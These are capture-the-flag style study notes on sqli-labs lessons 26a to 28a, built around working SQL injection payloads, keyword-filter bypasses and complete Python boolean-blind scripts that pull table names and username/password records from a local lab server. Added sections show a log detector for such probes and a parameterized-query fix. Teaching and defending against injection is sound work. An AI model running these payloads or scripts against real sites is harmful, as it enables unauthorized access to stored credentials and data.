DAY 5

sqli-labs lesson 26a

  • The closing characters are a single quote plus a parenthesis, and errors are not echoed. If the server is Linux, try %a0 in place of a space; here we go with boolean-based blind injection.
  • Database name length: ?id=1')&&if(length(database())=8,1,0)||('0
  • Dump the database name: ?id=1')&&if(left(database(),8)='security',1,0)||('0
  • Dump the tables:

    • When the condition is true the response length is 914; when it is false, 863.
    • A Python script to do the work:
      # coding: utf-8
      # Python 3 port (urllib.request) of the original Python 2 script; same logic.
      from urllib.request import urlopen

      print("26a")
      url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
      html = urlopen(url).read()   # sanity request: an always-true condition should show the login name

      pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
      end_url = "||(%270"

      def holds(condition):
          # Boolean oracle: the id=1 row (and its "Your Login name" text) appears only when the condition is true
          payload = "if((" + condition + "),1,0)"
          return b"Your Login name" in urlopen(pre_url + payload + end_url).read()

      from_ = "infoorrmation_schema.tables"   # doubled "or" survives the one-pass keyword stripping
      where = "table_schema='security'"
      select = "select(group_concat(table_name))from(" + from_ + ")where(" + where + ")"
      result = []
      for pos in range(1, 100):
          # Past the end of the string? The original tested ascii(mid(...))>127, which never fires
          # because ascii('') is 0; the length test used by the later scripts terminates correctly.
          if holds("length((" + select + "))<" + str(pos)):
              print("".join(result))
              break
          # Binary search the printable range 32..126 for the character at pos
          asc1 = 32
          asc2 = 127
          while asc1 < asc2:
              mid = (asc1 + asc2) // 2
              if holds("ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(mid)):
                  asc1 = mid + 1
              else:
                  asc2 = mid
          result.append(chr(asc1))
          print("".join(result))
      

  • Dump the columns:
# coding: utf-8
# Python 3 port (urllib.request) of the same loop, now targeting the column names of users
from urllib.request import urlopen

print("26a")
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urlopen(url).read()   # sanity request with an always-true condition

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"

def holds(condition):
    # Boolean oracle: "Your Login name" is shown only when the condition is true
    payload = "if((" + condition + "),1,0)"
    return b"Your Login name" in urlopen(pre_url + payload + end_url).read()

from_ = "infoorrmation_schema.columns"   # doubled "or" survives the one-pass keyword stripping
where = "table_schema='security'%26%26table_name='users'"
select = "select(group_concat(column_name))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1, 100):
    # Past the end of the string: print what was recovered and stop
    if holds("length((" + select + "))<" + str(pos)):
        print("".join(result))
        print("CRACKED")
        break
    # Binary search the printable range 32..126 for the character at pos
    asc1 = 32
    asc2 = 127
    while asc1 < asc2:
        mid = (asc1 + asc2) // 2
        if holds("ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(mid)):
            asc1 = mid + 1
        else:
            asc2 = mid
    result.append(chr(asc1))
    print("".join(result))
  • Dump the records:
# coding: utf-8
# Python 3 port (urllib.request) of the same loop, now reading username and password from users
from urllib.request import urlopen

print("26a")
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urlopen(url).read()   # sanity request with an always-true condition

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"

def holds(condition):
    # Boolean oracle: "Your Login name" is shown only when the condition is true
    payload = "if((" + condition + "),1,0)"
    return b"Your Login name" in urlopen(pre_url + payload + end_url).read()

from_ = "users"
where = "1=1"
# "passwoorrd": the doubled "or" survives the one-pass keyword stripping
select = "select(group_concat(concat(username,passwoorrd)))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1, 100):
    # Past the end of the string: print what was recovered and stop
    if holds("length((" + select + "))<" + str(pos)):
        print("".join(result))
        print("CRACKED")
        break
    # Binary search the printable range 32..126 for the character at pos
    asc1 = 32
    asc2 = 127
    while asc1 < asc2:
        mid = (asc1 + asc2) // 2
        if holds("ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(mid)):
            asc1 = mid + 1
        else:
            asc2 = mid
    result.append(chr(asc1))
    print("".join(result))

Note: the maximum extraction length (100 in the loops above) can be changed.
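The boolean oracle the notes rely on (a true condition gives a 914-byte page, a false one 863) is just as visible from the server side: one client sends a burst of near-identical requests whose only moving parts are a position and a comparison value, and the responses alternate between two sizes. The detection pass below over web-server access logs is an added example, not part of the original notes or of sqli-labs. The log lines are constructed, and the probe regexes and the threshold of three probes per client are assumptions to tune for a real deployment.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines in Common Log Format (not real traffic).
# 10.0.0.5 replays the shape of the scripts above against Less-26a: one length test,
# then a binary search on the first character, with responses flipping between 914 and 863.
LOG_LINES = """\
10.0.0.9 - - [05/Oct/2019:10:00:01 +0800] "GET /sqli-labs-master/Less-26a/?id=1 HTTP/1.1" 200 914
10.0.0.5 - - [05/Oct/2019:10:00:02 +0800] "GET /sqli-labs-master/Less-26a/?id=1%27)%26%26if((length((database()))<1),1,0)||(%270 HTTP/1.1" 200 863
10.0.0.5 - - [05/Oct/2019:10:00:02 +0800] "GET /sqli-labs-master/Less-26a/?id=1%27)%26%26if((ascii(mid((database()),1,1))>79),1,0)||(%270 HTTP/1.1" 200 914
10.0.0.5 - - [05/Oct/2019:10:00:03 +0800] "GET /sqli-labs-master/Less-26a/?id=1%27)%26%26if((ascii(mid((database()),1,1))>103),1,0)||(%270 HTTP/1.1" 200 914
10.0.0.5 - - [05/Oct/2019:10:00:03 +0800] "GET /sqli-labs-master/Less-26a/?id=1%27)%26%26if((ascii(mid((database()),1,1))>115),1,0)||(%270 HTTP/1.1" 200 863
10.0.0.5 - - [05/Oct/2019:10:00:04 +0800] "GET /sqli-labs-master/Less-26a/?id=1%27)%26%26if((ascii(mid((database()),1,1))>109),1,0)||(%270 HTTP/1.1" 200 914
10.0.0.9 - - [05/Oct/2019:10:00:05 +0800] "GET /sqli-labs-master/Less-26a/?id=2 HTTP/1.1" 200 910
""".splitlines()

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
# Assumed probe signatures: a conditional wrapping a character test or a length comparison.
CONDITIONAL = re.compile(r"\bif\s*\(", re.I)
CHAR_PROBE = re.compile(r"ascii\s*\(\s*(?:mid|substr|substring)\s*\(", re.I)
LENGTH_PROBE = re.compile(r"length\s*\(.*?\)\s*[<>=]", re.I)

def parse_line(line):
    """Split one CLF line into client, method, path, decoded query, status and response size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status, size = m.groups()
    parts = urlsplit(target)
    return {"client": client, "method": method, "path": parts.path,
            "query": unquote(parts.query),   # %27 -> ', %26%26 -> && so the SQL becomes visible
            "status": int(status), "size": int(size) if size.isdigit() else 0}

def is_blind_probe(query):
    """True when a decoded query string looks like one boolean-blind extraction step."""
    if not CONDITIONAL.search(query):
        return False
    return bool(CHAR_PROBE.search(query) or LENGTH_PROBE.search(query))

def find_blind_clients(lines, min_probes=3):
    """Group probe requests by client and report those at or above the threshold, together
    with the distinct response sizes seen: exactly two sizes is the boolean oracle itself."""
    stats = defaultdict(lambda: {"probes": 0, "sizes": set(), "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_blind_probe(rec["query"]):
            continue
        entry = stats[rec["client"]]
        entry["probes"] += 1
        entry["sizes"].add(rec["size"])
        entry["paths"].add(rec["path"])
    return {client: {"probes": e["probes"], "sizes": sorted(e["sizes"]), "paths": sorted(e["paths"])}
            for client, e in stats.items() if e["probes"] >= min_probes}

if __name__ == "__main__":
    for client, info in find_blind_clients(LOG_LINES).items():
        print(client, info)
```

Decoding the query string before matching is the step that matters: the `%26%26` in the scripts above is `&&` only after URL decoding, and a rule run over the raw log line would have to carry every encoding variant. The per-client count is what separates a single curious request from an extraction loop, which by the scripts' own construction needs roughly seven requests per recovered character.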

sqli-labs lesson 27

  • select, SELECT and Select (and the like) are filtered, so go straight to error-based injection.
  • Dump the database name: ?id=1%27%26%26extractvalue(1,concat(0x7e,(database()),0x7e))||%27
  • Dump the tables: ?id=1'%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e))||'
  • Dump the columns: ?id=1'%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'%26%26table_name='users')),0x7e))||'
  • Dump the records: http://localhost/sqli-labs-master/Less-27/?id=1'%26%26extractvalue(1,concat(0x7e,mid((seLect(group_concat(concat_ws(',',username,password)))from(security.users)),position,length),0x7e))||%27
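Both of the filter weaknesses these notes rely on, the doubled keyword of lesson 26a (infoorrmation, passwoorrd) and the fixed-spelling select blacklist of lesson 27 (seLect), come down to the same design mistake: filtering input and then splicing it into query text. The following is an added example written from the defender's side; it is not the lab's PHP or the author's code. The two strip functions are simplified assumptions about how the lab filters, the users table and its rows are constructed, and SQLite stands in for MySQL. It shows the filter gap and then that binding the id as a parameter makes the same raw input harmless without any keyword filtering.

```python
import re
import sqlite3

def strip_keywords_once(value):
    # Simplified model (an assumption, not the lab's PHP) of a single-pass blacklist
    # that deletes "or", "and" and spaces regardless of case. Because it runs once,
    # a doubled spelling re-forms the keyword after the inner match is removed.
    for word in ("or", "and", " "):
        value = re.sub(re.escape(word), "", value, flags=re.IGNORECASE)
    return value

def strip_select_exact(value):
    # Model of a blacklist that knows only three spellings of one keyword.
    for word in ("select", "SELECT", "Select"):
        value = value.replace(word, "")
    return value

def make_db():
    # Constructed in-memory stand-in for the lab's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return conn

def lookup_filtered_concat(conn, raw_id):
    # The weak pattern: filter the input, then splice it into the query text.
    sql = "SELECT username FROM users WHERE id=('%s') LIMIT 1" % strip_keywords_once(raw_id)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_parameterized(conn, raw_id):
    # The fix: the value is bound as data, so whatever characters it contains it can
    # only ever be compared with id; no keyword filter is needed at all.
    row = conn.execute("SELECT username FROM users WHERE id=(?) LIMIT 1", (raw_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    print(strip_keywords_once("infoorrmation_schema"))  # information_schema: the filter ate the inner "or"
    print(strip_select_exact("seLect"))                  # seLect: not one of the three spellings, passes through
    conn = make_db()
    tainted = "999')oorr('1'='1"   # constructed: no such id, but a tautology once "oorr" collapses to "or"
    print(lookup_filtered_concat(conn, tainted))   # alice: the filtered string still changed the query
    print(lookup_parameterized(conn, tainted))     # None: compared as a literal string, nothing matches
```

The point of running both lookups on the same input is that the parameterized version needs no list of bad words, no case handling and no second filtering pass: the only thing left for a filter to do is validate that the id is an integer, which rejects the input for a reason unrelated to SQL syntax.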

sqli-labs 27a

  • Still blind injection
  • Detecting the injection point and the closing characters: ?id=1"%26%260||"0
  • Dump the database name:
# coding: utf-8
# Python 3 port (urllib.request) of the same boolean-blind loop, with a double quote as the closing character
from urllib.request import urlopen

print("27a")
# url = "http://localhost/sqli-labs-master/Less-27/?id=1%22a)%26%26if(1,1,0)||(%220"
# html = urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-27a/?id=1%22%26%26"
end_url = "||%220"

def holds(condition):
    # Boolean oracle: "Your Login name" is shown only when the condition is true
    payload = "if((" + condition + "),1,0)"
    return b"Your Login name" in urlopen(pre_url + payload + end_url).read()

from_ = "users"
where = "1=1"
# select = "seLect(group_concat(concat(username,password)))from(" + from_ + ")where(" + where + ")"
select = "database()"
result = []
for pos in range(1, 100):
    # Past the end of the string: print what was recovered and stop
    if holds("length((" + select + "))<" + str(pos)):
        print("".join(result))
        print("CRACKED")
        break
    # Binary search the printable range 32..126 for the character at pos
    asc1 = 32
    asc2 = 127
    while asc1 < asc2:
        mid = (asc1 + asc2) // 2
        if holds("ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(mid)):
            asc1 = mid + 1
        else:
            asc2 = mid
    result.append(chr(asc1))
    print("".join(result))

  • Tables, columns, records: same code as lesson 26a; only the URL changes.

sqli-labs lesson 28

  • The closing characters are '); the blind injection is solved the same way as the previous lesson.
  • Error-based injection: same as lesson 27.

sqli-labs lesson 28a

  • Same blind-injection solution as lesson 28.

sqli-labs lesson 29
